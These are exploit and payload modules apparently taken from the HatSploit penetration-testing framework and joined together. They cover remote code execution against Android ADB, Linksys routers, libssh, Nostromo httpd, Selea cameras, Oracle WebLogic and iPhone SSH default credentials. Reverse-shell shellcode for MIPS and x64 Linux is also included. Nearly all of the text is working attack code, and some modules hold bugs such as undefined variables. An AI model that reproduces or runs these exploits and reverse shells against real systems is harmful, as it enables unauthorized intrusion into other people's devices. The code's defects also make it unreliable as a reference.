class HatSploitModule(Module, Handler, ADBClient, TCPClient): details = { 'Name': "Android ADB Remote Code Execution", 'Module': "exploit/android/adb/remote_code_execution", 'Authors': ['Ivan Nikolsky (enty8080)'], 'Description': "Remote Code Execution in Android ADB.", 'Dependencies': [''], 'Comments': [''], 'Platform': "android", 'Risk': "high" } payload = { 'Description': "Payload to use.", 'Value': "unix/generic/sh_reverse_tcp", 'Categories': None, 'Architectures': ['armle', 'aarch64', 'generic'], 'Platforms': ['android', 'linux', 'unix'], 'Types': None } options = { 'RHOST': { 'Description': "Remote host.", 'Value': None, 'Type': "ip", 'Required': True }, 'SRVHOST': { 'Description': "Local host to listen on.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'SRVPORT': { 'Description': "Local port to listen on.", 'Value': 8888, 'Type': "port", 'Required': True } } def adb_clean_up(self): self.output_process("Stopping ADB server...") if not self.stop_adb_server(): self.output_error("Failed to stop ADB server!") def adb_execute_command(self, command): command_output = self.execute_adb_command("shell", command) return True, command_output def adb_start_server(self): self.output_process("Starting ADB server...") if not self.start_adb_server(): self.output_error("Failed to start ADB server!") return def run(self): remote_host, local_host, local_port = self.parse_options(self.options) self.output_process("Checking ADB installation...") if not self.check_adb_installation(): self.output_error("ADB is not installed!") return self.adb_start_server() self.output_process(f"Exploiting {remote_host}...") if not self.connect_adb_client(remote_host): self.output_error("Exploit failed!") self.clean_up() return if not self.check_connected(remote_host): self.output_error("Exploit failed!") self.clean_up() return self.handle_session(host=local_host, port=local_port, payload=self.payload, sender=self.adb_execute_command, timeout=10)
class HatSploitModule(Module, Handler, HTTPClient, TCPClient): details = { 'Name': "Linksys WVBR0 25 Remote Code Execution", 'Module': "exploit/unix/linksys/wvbr0_25_rce", 'Authors': ['Ivan Nikolsky (enty8080)', 'HeadlessZeke (headlesszeke)'], 'Description': "Remote Code Execution in Linksys WVBR0 25.", 'Dependencies': [''], 'Comments': [''], 'Platform': "unix", 'Risk': "high" } payload = { 'Description': "Payload to use.", 'Value': "unix/generic/netcat_reverse_tcp", 'Categories': None, 'Architectures': ['mipsle', 'mipsbe', 'generic'], 'Platforms': None, 'Types': None } options = { 'RHOST': { 'Description': "Remote host.", 'Value': None, 'Type': "ip", 'Required': True }, 'RPORT': { 'Description': "Remote port.", 'Value': 80, 'Type': "port", 'Required': True }, 'SRVHOST': { 'Description': "Local host to listen on.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'SRVPORT': { 'Description': "Local port to listen on.", 'Value': 8888, 'Type': "port", 'Required': True } } def execute_command(self, remote_host, remote_port, command): payload = f"\"; {command} #" self.http_request(method="GET", host=remote_host, port=remote_port, headers={'User-Agent': payload}) def run(self): remote_host, remote_port, local_host, local_port = self.parse_options( self.options) self.output_process(f"Exploiting {remote_host}...") self.handle_session(host=local_host, port=local_port, payload=self.payload, sender=self.execute_command, args=[remote_host, remote_port], timeout=10)
class HatSploitPayload(Payload, HatVenom, TCPClient): details = { 'Category': "stager", 'Name': "Linux mipsbe Shell Reverse TCP", 'Payload': "linux/mipsbe/shell_reverse_tcp", 'Authors': [ 'Ivan Nikolsky (enty8080)' ], 'Description': "Shell reverse TCP payload for Linux mipsbe.", 'Dependencies': [ '' ], 'Comments': [ '' ], 'Architecture': "mipsbe", 'Platform': "linux", 'Risk': "high", 'Type': "reverse_tcp" } options = { 'LHOST': { 'Description': "Local host.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'LPORT': { 'Description': "Local port.", 'Value': 8888, 'Type': "port", 'Required': True } } def run(self): local_host, local_port = self.parse_options(self.options) offsets = { 'lport': local_port, 'lhost1': self.ip_bytes(local_host)[:2], 'lhost2': self.ip_bytes(local_host)[2:] } self.output_process("Generating shellcode...") shellcode = ( b"\x28\x04\xff\xff" # slti a0,zero,-1 b"\x24\x02\x0f\xa6" # li v0,4006 b"\x01\x09\x09\x0c" # syscall 0x42424 b"\x28\x04\x11\x11" # slti a0,zero,4369 b"\x24\x02\x0f\xa6" # li v0,4006 b"\x01\x09\x09\x0c" # syscall 0x42424 b"\x24\x0c\xff\xfd" # li t4,-3 b"\x01\x80\x20\x27" # nor a0,t4,zero b"\x24\x02\x0f\xa6" # li v0,4006 b"\x01\x09\x09\x0c" # syscall 0x42424 b"\x24\x0c\xff\xfd" # li t4,-3 b"\x01\x80\x20\x27" # nor a0,t4,zero b"\x01\x80\x28\x27" # nor a1,t4,zero b"\x28\x06\xff\xff" # slti a2,zero,-1 b"\x24\x02\x10\x57" # li v0,4183 b"\x01\x09\x09\x0c" # syscall 0x42424 b"\x30\x44\xff\xff" # andi a0,v0,0xffff b"\x24\x02\x0f\xc9" # li v0,4041 b"\x01\x09\x09\x0c" # syscall 0x42424 b"\x24\x02\x0f\xc9" # li v0,4041 b"\x01\x09\x09\x0c" # syscall 0x42424 b"\x3c\x05\x00\x02" # lui a1,0x2 b"\x34\xa5:lport:port:" # "\x7a\x69" # ori a1,a1,0x7a69 b"\xaf\xa5\xff\xf8" # sw a1,-8(sp) b"\x3c\x05:lhost1:" # "\xc0\xa8" # lui a1,0xc0a8 b"\x34\xa5:lhost2:" # "\x01\x37" # ori a1,a1,0x137 b"\xaf\xa5\xff\xfc" # sw a1,-4(sp) b"\x23\xa5\xff\xf8" # addi a1,sp,-8 b"\x24\x0c\xff\xef" # li t4,-17 b"\x01\x80\x30\x27" # nor a2,t4,zero b"\x24\x02\x10\x4a" # li v0,4170 b"\x01\x09\x09\x0c" # syscall 0x42424 b"\x3c\x08\x2f\x2f" # lui t0,0x2f2f b"\x35\x08\x62\x69" # ori t0,t0,0x6269 b"\xaf\xa8\xff\xec" # sw t0,-20(sp) b"\x3c\x08\x6e\x2f" # lui t0,0x6e2f b"\x35\x08\x73\x68" # ori t0,t0,0x7368 b"\xaf\xa8\xff\xf0" # sw t0,-16(sp) b"\x28\x07\xff\xff" # slti a3,zero,-1 b"\xaf\xa7\xff\xf4" # sw a3,-12(sp) b"\xaf\xa7\xff\xfc" # sw a3,-4(sp) b"\x23\xa4\xff\xec" # addi a0,sp,-20 b"\x23\xa8\xff\xec" # addi t0,sp,-20 b"\xaf\xa8\xff\xf8" # sw t0,-8(sp) b"\x23\xa5\xff\xf8" # addi a1,sp,-8 b"\x27\xbd\xff\xec" # addiu sp,sp,-20 b"\x28\x06\xff\xff" # slti a2,zero,-1 b"\x24\x02\x0f\xab" # li v0,4011 b"\x00\x90\x93\x4c" # syscall 0x2424d ) self.output_process("Generating payload...") payload = self.generate('elf', 'mipsbe', shellcode, offsets) return payload
class HatSploitPayload(Payload, PayloadGenerator, TCPClient): details = { 'Category': "stager", 'Name': "Linux mipsle Shell Reverse TCP", 'Payload': "linux/mipsle/shell_reverse_tcp", 'Authors': ['Ivan Nikolsky (enty8080)'], 'Description': "Shell reverse TCP payload for Linux mipsle.", 'Dependencies': [''], 'Comments': [''], 'Architecture': "mipsle", 'Platform': "linux", 'Risk': "high", 'Type': "reverse_tcp" } options = { 'LHOST': { 'Description': "Local host.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'LPORT': { 'Description': "Local port.", 'Value': 8888, 'Type': "port", 'Required': True }, 'FORMAT': { 'Description': "Executable format.", 'Value': "elf", 'Type': None, 'Required': True } } def run(self): local_host, local_port, executable_format = self.parse_options( self.options) local_host = self.host_to_bytes(local_host) local_port = self.port_to_bytes(local_port) if executable_format not in self.formats.keys(): self.output_error("Invalid executable format!") return self.output_process("Generating shellcode...") shellcode = ( b"\xff\xff\x04\x28" # slti a0,zero,-1 b"\xa6\x0f\x02\x24" # li v0,4006 b"\x0c\x09\x09\x01" # syscall 0x42424 b"\x11\x11\x04\x28" # slti a0,zero,4369 b"\xa6\x0f\x02\x24" # li v0,4006 b"\x0c\x09\x09\x01" # syscall 0x42424 b"\xfd\xff\x0c\x24" # li t4,-3 b"\x27\x20\x80\x01" # nor a0,t4,zero b"\xa6\x0f\x02\x24" # li v0,4006 b"\x0c\x09\x09\x01" # syscall 0x42424 b"\xfd\xff\x0c\x24" # li t4,-3 b"\x27\x20\x80\x01" # nor a0,t4,zero b"\x27\x28\x80\x01" # nor a1,t4,zero b"\xff\xff\x06\x28" # slti a2,zero,-1 b"\x57\x10\x02\x24" # li v0,4183 b"\x0c\x09\x09\x01" # syscall 0x42424 b"\xff\xff\x44\x30" # andi a0,v0,0xffff b"\xc9\x0f\x02\x24" # li v0,4041 b"\x0c\x09\x09\x01" # syscall 0x42424 b"\xc9\x0f\x02\x24" # li v0,4041 b"\x0c\x09\x09\x01" # syscall 0x42424 + local_port + b"\x05\x3c" # "\x7a\x69" lui a1,0x697a b"\x02\x00\xa5\x34" # ori a1,a1,0x2 b"\xf8\xff\xa5\xaf" # sw a1,-8(sp) + local_host[2:] + b"\x05\x3c" # "\x00\x01" lui a1,0x100 + local_host[:2] + b"\xa5\x34" # "\x7f\x00" ori a1,a1,0x7f b"\xfc\xff\xa5\xaf" # sw a1,-4(sp) b"\xf8\xff\xa5\x23" # addi a1,sp,-8 b"\xef\xff\x0c\x24" # li t4,-17 b"\x27\x30\x80\x01" # nor a2,t4,zero b"\x4a\x10\x02\x24" # li v0,4170 b"\x0c\x09\x09\x01" # syscall 0x42424 b"\x62\x69\x08\x3c" # lui t0,0x6962 b"\x2f\x2f\x08\x35" # ori t0,t0,0x2f2f b"\xec\xff\xa8\xaf" # sw t0,-20(sp) b"\x73\x68\x08\x3c" # lui t0,0x6873 b"\x6e\x2f\x08\x35" # ori t0,t0,0x2f6e b"\xf0\xff\xa8\xaf" # sw t0,-16(sp) b"\xff\xff\x07\x28" # slti a3,zero,-1 b"\xf4\xff\xa7\xaf" # sw a3,-12(sp) b"\xfc\xff\xa7\xaf" # sw a3,-4(sp) b"\xec\xff\xa4\x23" # addi a0,sp,-20 b"\xec\xff\xa8\x23" # addi t0,sp,-20 b"\xf8\xff\xa8\xaf" # sw t0,-8(sp) b"\xf8\xff\xa5\x23" # addi a1,sp,-8 b"\xec\xff\xbd\x27" # addiu sp,sp,-20 b"\xff\xff\x06\x28" # slti a2,zero,-1 b"\xab\x0f\x02\x24" # li v0,4011 b"\x0c\x09\x09\x01" # syscall 0x42424 ) self.output_process("Generating payload...") payload = self.generate(executable_format, 'mipsle', shellcode) return payload
class HatSploitModule(Module, Handler, TCPClient): buffer_size = 2048 client = None details = { 'Name': "SSH LibSSH Code Execution", 'Module': "exploit/unix/ssh/libssh_code_execution", 'Authors': ['Ivan Nikolsky (enty8080)', 'Peter Winter-Smith (peterwintersmith)'], 'Description': "SSH LibSSH unauthorized access Remote Code Execution.", 'Dependencies': ['paramiko'], 'Comments': [''], 'Platform': "unix", 'Risk': "medium" } payload = { 'Description': "Payload to use.", 'Value': "unix/generic/netcat_reverse_tcp", 'Categories': None, 'Architectures': None, 'Platforms': None, 'Types': None } options = { 'RHOST': { 'Description': "Remote host.", 'Value': None, 'Type': "ip", 'Required': True }, 'RPORT': { 'Description': "Remote port.", 'Value': 2222, 'Type': "port", 'Required': True }, 'SRVHOST': { 'Description': "Local host to listen on.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'SRVPORT': { 'Description': "Local port to listen on.", 'Value': 8888, 'Type': "port", 'Required': True } } def obtain_banner(self, remote_host, remote_port): try: sock = socket.create_connection((remote_host, int(remote_port))) sock.settimeout(5) banner = sock.recv(self.buffer_size) sock.close() return banner.split(b'\n')[0].decode().strip() except Exception: return None def check_vulnerable(self, remote_host, remote_port): banner = self.obtain_banner(remote_host, remote_port) if banner: if any(version in banner for version in ['libssh-0.6', 'libssh_0.6']): return True if any(version in banner for version in ['libssh-0.7', 'libssh_0.7']): if int(banner.split('.')[-1]) < 6: return True if any(version in banner for version in ['libssh-0.8', 'libssh_0.8']): if int(banner.split('.')[-1]) < 4: return True return False @staticmethod def execute_command(remote_host, remote_port, command): sock = socket.socket() sock.connect((remote_host, int(remote_port))) message = paramiko.message.Message() transport = paramiko.transport.Transport(sock) transport.start_client() message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS) transport._send_message(message) transport.open_session(timeout=5).exec_command(command) def run(self): remote_host, remote_port, local_host, local_port = self.parse_options( self.options) self.output_process(f"Exploiting {remote_host}...") if not self.check_vulnerable(remote_host, remote_port): self.output_error("Exploit failed!") return self.handle_session(host=local_host, port=local_port, payload=self.payload, sender=self.execute_command, args=[remote_host, remote_port], timeout=10)
class HatSploitModule(Module, Handler, HTTPClient, TCPClient): details = { 'Name': "Nostromo Httpd Remote Code Execution", 'Module': "exploit/unix/nostromo/remote_code_execution", 'Authors': ['Ivan Nikolsky (enty8080)', 'sp0re (sp0re)'], 'Description': "Remote Code Execution in Nostromo Httpd.", 'Dependencies': [''], 'Comments': [''], 'Platform': "unix", 'Risk': "high" } payload = { 'Description': "Payload to use.", 'Value': "linux/x64/shell_reverse_tcp", 'Categories': None, 'Architectures': None, 'Platforms': None, 'Types': None } options = { 'RHOST': { 'Description': "Remote host.", 'Value': None, 'Type': "ip", 'Required': True }, 'RPORT': { 'Description': "Remote port.", 'Value': 80, 'Type': "port", 'Required': True }, 'SRVHOST': { 'Description': "Local host to listen on.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'SRVPORT': { 'Description': "Local port to listen on.", 'Value': 8888, 'Type': "port", 'Required': True } } def execute_command(self, remote_host, remote_port, command): payload = "" payload += "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\n" payload += "Content-Length: 1\r\n\r\necho\necho\n" payload += f"{command} 2>&1" self.tcp_request(host=remote_host, port=remote_port, data=payload) def check_vulnerable(self, remote_host, remote_port): response = self.http_request(method="HEAD", host=remote_host, port=remote_port, path="/") if response is not None: if 'Server' in response.headers.keys(): server = response.headers['Server'] if int(server.split('.')[-1]) < 7: return True return False def run(self): remote_host, remote_port, local_host, local_port = self.parse_options( self.options) self.output_process(f"Exploiting {remote_host}...") if not self.check_vulnerable(remote_host, remote_port): self.output_error("Exploit failed!") return self.handle_session(host=local_host, port=local_port, payload=self.payload, sender=self.execute_command, args=[remote_host, remote_port], timeout=10)
class HatSploitPayload(Payload, PayloadGenerator, TCPClient): details = { 'Category': "stager", 'Name': "Linux x64 Shell Reverse TCP", 'Payload': "linux/x64/shell_reverse_tcp", 'Authors': ['Ivan Nikolsky (enty8080)'], 'Description': "Shell reverse TCP payload for Linux x64.", 'Dependencies': [''], 'Comments': [''], 'Architecture': "x64", 'Platform': "linux", 'Risk': "high", 'Type': "reverse_tcp" } options = { 'LHOST': { 'Description': "Local host.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'LPORT': { 'Description': "Local port.", 'Value': 8888, 'Type': "port", 'Required': True }, 'FORMAT': { 'Description': "Executable format.", 'Value': "elf", 'Type': None, 'Required': True } } def run(self): local_host, local_port, executable_format = self.parse_options( self.options) local_host = self.host_to_bytes(local_host) local_port = self.port_to_bytes(local_port) if executable_format not in self.formats.keys(): self.output_error("Invalid executable format!") return self.output_process("Generating shellcode...") shellcode = ( b"\x6a\x29" # pushq $0x29 b"\x58" # pop %rax b"\x99" # cltd b"\x6a\x02" # pushq $0x2 b"\x5f" # pop %rdi b"\x6a\x01" # pushq $0x1 b"\x5e" # pop %rsi b"\x0f\x05" # syscall b"\x48\x97" # xchg %rax,%rdi b"\x48\xb9\x02\x00" # movabs $0x100007fb3150002,%rcx + local_port + # port +local_host + # ip b"\x51" # push %rcx b"\x48\x89\xe6" # mov %rsp,%rsi b"\x6a\x10" # pushq $0x10 b"\x5a" # pop %rdx b"\x6a\x2a" # pushq $0x2a b"\x58" # pop %rax b"\x0f\x05" # syscall b"\x6a\x03" # pushq $0x3 b"\x5e" # pop %rsi b"\x48\xff\xce" # dec %rsi b"\x6a\x21" # pushq $0x21 b"\x58" # pop %rax b"\x0f\x05" # syscall b"\x75\xf6" # jne 27 <dup2_loop> b"\x6a\x3b" # pushq $0x3b b"\x58" # pop %rax b"\x99" # cltd b"\x48\xbb\x2f\x62\x69\x6e\x2f" # movabs $0x68732f6e69622f,%rbx b"\x73\x68\x00" # [redacted] b"\x53" # push %rbx b"\x48\x89\xe7" # mov %rsp,%rdi b"\x52" # push %rdx b"\x57" # push %rdi b"\x48\x89\xe6" # mov %rsp,%rsi b"\x0f\x05" # syscall ) self.output_process("Generating payload...") payload = self.generate(executable_format, 'x64', shellcode) return payload
class HatSploitModule(Module, Handler, HTTPClient, TCPClient): details = { 'Name': "Selea ANPR Camera Authenticated RCE", 'Module': "exploit/unix/selea/anpr_authenticated_rce", 'Authors': ['Ivan Nikolsky (enty8080)', 'LiquidWorm (liquidworm)'], 'Description': "Selea ANPR Camera authenticated remote code execution.", 'Dependencies': [''], 'Comments': [''], 'Platform': "unix", 'Risk': "high" } payload = { 'Description': "Payload to use.", 'Value': "unix/generic/netcat_reverse_tcp", 'Categories': None, 'Architectures': ['mipsle', 'mipsbe', 'generic'], 'Platforms': None, 'Types': None } options = { 'RHOST': { 'Description': "Remote host.", 'Value': None, 'Type': "ip", 'Required': True }, 'RPORT': { 'Description': "Remote port.", 'Value': 81, 'Type': "port", 'Required': True }, 'SRVHOST': { 'Description': "Local host to listen on.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'SRVPORT': { 'Description': "Local port to listen on.", 'Value': 8888, 'Type': "port", 'Required': True }, 'USERNAME': { 'Description': "Username for authorization.", 'Value': "admin", 'Type': None, 'Required': True }, 'PASSWORD': { 'Description': "Password for authorization.", 'Value': None, 'Type': None, 'Required': True } } def execute_command(self, remote_host, remote_port, username, password, command): auth_token = base64.b64encode(f"{username}:{password}".encode()) headers = {'Authorization': f"Basic {auth_token.decode()}"} payload = f"/cgi-bin/utils.php?cmd=addr_check&addr=\ $({command})&type=port&port=80" self.http_request(method="GET", host=remote_host, port=remote_port, path=payload, headers=header) def run(self): remote_host, remote_port, username, password = self.parse_options( self.options) self.output_process(f"Exploiting {remote_host}...") self.handle_session( host=local_host, port=local_port, payload=self.payload, sender=self.execute_command, args=[remote_host, remote_port, username, password], timeout=10)
class HatSploitModule(Module, Handler, HTTPClient, TCPClient): details = { 'Name': "Linksys WAP54Gv3 debug Remote Code Execution", 'Module': "exploit/unix/linksys/wap54gv3_debug_rce", 'Authors': ['Ivan Nikolsky (enty8080)', 'Phil Purviance'], 'Description': "Remote Code Execution in Linksys WAP54Gv3.", 'Dependencies': [''], 'Comments': [''], 'Platform': "unix", 'Risk': "high" } payload = { 'Description': "Payload to use.", 'Value': "linux/mipsle/shell_reverse_tcp", 'Categories': None, 'Architectures': ['mipsle', 'mipsbe', 'generic'], 'Platforms': None, 'Types': None } options = { 'RHOST': { 'Description': "Remote host.", 'Value': None, 'Type': "ip", 'Required': True }, 'RPORT': { 'Description': "Remote port.", 'Value': 80, 'Type': "port", 'Required': True }, 'SRVHOST': { 'Description': "Local host to listen on.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'SRVPORT': { 'Description': "Local port to listen on.", 'Value': 8888, 'Type': "port", 'Required': True } } def execute_command(self, remote_host, remote_port, command): payload = {"data1": command, "command": "ui_debug"} self.http_request(method="POST", host=remote_host, port=remote_port, path='/debug.cgi', data=payload, auth=("Gemtek", "gemtekswd")) def check_vulnerable(self, remote_host, remote_port): response = self.http_request(method="GET", host=remote_host, port=remote_port, path="/debug.cgi", auth=("Gemtek", "gemtekswd")) if response is None or response.status_code != 200: return False def run(self): remote_host, remote_port, local_host, local_port = self.parse_options( self.options) self.output_process(f"Exploiting {remote_host}...") if not self.check_vulnerable(remote_host, remote_port): self.output_error("Exploit failed!") return self.handle_session(host=local_host, port=local_port, payload=self.payload, sender=self.execute_command, args=[remote_host, remote_port], timeout=10)
class HatSploitModule(Module, Handler, TCPClient): details = { 'Name': "iPhoneOS SSH Default Password", 'Module': "exploit/iphoneos/ssh/cydia_default_password", 'Authors': ['Ivan Nikolsky (enty8080)'], 'Description': "Bypass iPhoneOS SSH authorization using default SSH password.", 'Dependencies': ['paramiko'], 'Comments': [''], 'Platform': "iphoneos", 'Risk': "medium" } payload = { 'Description': "Payload to use.", 'Value': "unix/generic/bash_reverse_tcp", 'Categories': None, 'Architectures': ['armle', 'aarch64', 'generic'], 'Platforms': ['iphoneos', 'linux', 'unix'], 'Types': None } options = { 'RHOST': { 'Description': "Remote host.", 'Value': None, 'Type': "ip", 'Required': True }, 'RPORT': { 'Description': "Remote port.", 'Value': 22, 'Type': "port", 'Required': True }, 'USERNAME': { 'Description': "Shell username.", 'Value': "mobile", 'Type': None, 'Required': True }, 'SRVHOST': { 'Description': "Local host to listen on.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'SRVPORT': { 'Description': "Local port to listen on.", 'Value': 8888, 'Type': "port", 'Required': True } } def run(self): remote_host, remote_port, username, local_host, local_port = self.parse_options( self.options) self.output_process(f"Exploiting {remote_host}...") self.output_process(f"Logging as {username}...") try: client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) client.connect(remote_host, port=remote_port, username=username, password='******') except Exception: self.output_error("Exploit failed!") return self.output_success(f"Successfully logged as {username}!") self.handle_session(host=local_host, port=local_port, payload=self.payload, sender=client.exec_command, timeout=10) client.close()
class HatSploitModule(Module, Handler, HTTPClient, TCPClient): details = { 'Name': "Oracle Weblogic console RCE", 'Module': "exploit/unix/oracle/weblogic_console_rce", 'Authors': ['Ivan Nikolsky (enty8080)'], 'Description': "Remote Code Execution in Oracle Weblogic <=", 'Dependencies': [''], 'Comments': [''], 'Platform': "unix", 'Risk': "high" } payload = { 'Description': "Payload to use.", 'Value': "unix/generic/netcat_reverse_tcp", 'Categories': ['single'], 'Architectures': None, 'Platforms': None, 'Types': ['reverse_tcp'] } options = { 'RHOST': { 'Description': "Remote host.", 'Value': None, 'Type': "ip", 'Required': True }, 'RPORT': { 'Description': "Remote port.", 'Value': None, 'Type': "port", 'Required': True }, 'SRVHOST': { 'Description': "Local host to listen on.", 'Value': TCPClient.get_local_host(), 'Type': "ip", 'Required': True }, 'SRVPORT': { 'Description': "Local port to listen on.", 'Value': 8888, 'Type': "port", 'Required': True } } def execute_command(self, remote_host, remote_port, command): path = "/console/images/%252E%252E%252Fconsole.portal" payload = f"_nfpb=false&_pageLabel=&\"java.lang.Runtime.getRuntime().exec('{command}');\");" headers = { "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded" } self.http_request(method="POST", host=remote_host, port=remote_port, path=path, data=payload) def check_vulnerable(self, remote_host, remote_port): response = self.http_request( method="GET", host=remote_host, port=remote_port, path="/console/images/%252E%252E%252Fconsole.portal") if response is None or response.status_code != 200: return False def run(self): remote_host, remote_port, local_host, local_port = self.parse_options( self.options) self.output_process(f"Exploiting {remote_host}...") if not self.check_vulnerable(remote_host, remote_port): self.output_error("Exploit failed!") return self.handle_session(host=local_host, port=local_port, payload=self.payload, sender=self.execute_command, args=[remote_host, remote_port], timeout=10)